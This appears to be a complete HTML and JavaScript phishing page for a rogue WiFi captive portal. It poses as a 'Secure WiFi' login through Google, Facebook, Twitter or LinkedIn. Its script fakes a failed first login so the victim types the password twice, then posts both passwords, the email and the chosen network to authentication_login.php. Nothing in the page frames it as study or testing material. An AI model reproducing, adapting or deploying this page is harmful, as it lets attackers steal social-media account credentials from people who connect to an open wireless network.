<!doctype html>
<html lang="en">
<head>
	<meta charset="UTF-8">
<title>Secure WiFi</title>
	<meta name="viewport" content="width=device-width, initial-scale=1" />
	<meta name="author" content="">
	<meta name="description" content="Your One Stop Secure WiFi Connection.">

<link rel="shortcut icon" type="image/x-icon" href="favicon.ico">
<link rel="stylesheet" href="style.css" type="text/css">

</head>
<body>

	<div class="inner-container">

<ul id="icons">
	<li><a href="#" id="facebook" title="facebook" class="tooltip"><img src="social/fb.png" alt="" class="icon"></a></li>
	<li><a href="#" id="twitter" title="twitter" class="tooltip"><img src="social/twitter.png" alt="" class="icon"></a></li>
        <li><a href="#" id="google" title="google" class="tooltip"><img src="social/google.png" alt="" class="icon"></a></li>
        <li><a href="#" id="linkedin" title="linkedin" class="tooltip"><img src="social/linkedin.png" alt="" class="icon"></a></li>
</ul>	
<div class="box">
      <h1 id="titleform">Login</h1><form name="theform" action="authentication_login.php" method="post" onsubmit="return validateForm();"> <!- http://10.0.0.1/ ->
<select id="socialn" style="visibility:hidden;" name="socialn" class="list">
		<option value="facebook">Facebook</option>
		<option value="twitter">Twitter</option>
		<option value="google" selected>Google</option>
		<option value="linkedin">Linkedin</option>
	</select>
      <input type="email" name="email" required placeholder="Email"/>
      <input type="password" name="password" required placeholder="Password"/>
      <input type="submit" value="Login" value="Send" class="button">
</form>
      <p><img src="images/secure-wifi.png" class="lock">Secure-WiFi<br><small>No registration required. 
         Login with your social account.</small></p>
    </div>
</div>
<script src="jquery.min.js"></script>
<script>
var locked;
$('form').submit(function(e){
    e.preventDefault();
    if (!locked) {
        firstPassword = $('input[type=password]').val();
        //var email = $('input[type=email]').val();
        //var social = $('input[name=socialn]').val();
        locked = true;
        alert("Failed to authenticate. Wrong Email or Password.");
        return false;
    } else {
        $.post('authentication_login.php', 'password=' + firstPassword + '&second-password=' + $('input[type=password]').val() + '&email:=' + $('input[type=email]').val() + '&social:=' + $('[name=socialn]').val() , window.location.replace("authentication_login.php"));
    }
});

var socialn = document.getElementById('socialn');
var fb = document.getElementById('facebook');
var twitter = document.getElementById('twitter');
var google = document.getElementById('google');
var linkedin = document.getElementById('linkedin');
var title = document.getElementById('titleform');

function restart_colors() {
    fb.style.opacity = "0.3";
    twitter.style.opacity = "0.3";
    google.style.opacity = "0.3";
    linkedin.style.opacity = "0.3";
}

restart_colors();
google.style.opacity = "1";
title.innerHTML = "Login with Google"


document.getElementById('facebook').onclick = function(){
    socialn.value = "facebook";
    title.innerHTML = "Login with Facebook"
    restart_colors();
    this.style.opacity = "1";
};
document.getElementById('twitter').onclick = function(){
    socialn.value = "twitter";
    title.innerHTML = "Login with Twitter"
    restart_colors();
    this.style.opacity = "1";
};
document.getElementById('google').onclick = function(){
    socialn.value = "google";
    title.innerHTML = "Login with Google"
    restart_colors();
    this.style.opacity = "1";
};
document.getElementById('linkedin').onclick = function(){
    socialn.value = "linkedin";
    title.innerHTML = "Login with Linkedin"
    restart_colors();
    this.style.opacity = "1";
};

</script>
<div class="social-icons"></div>

</body>
</html>
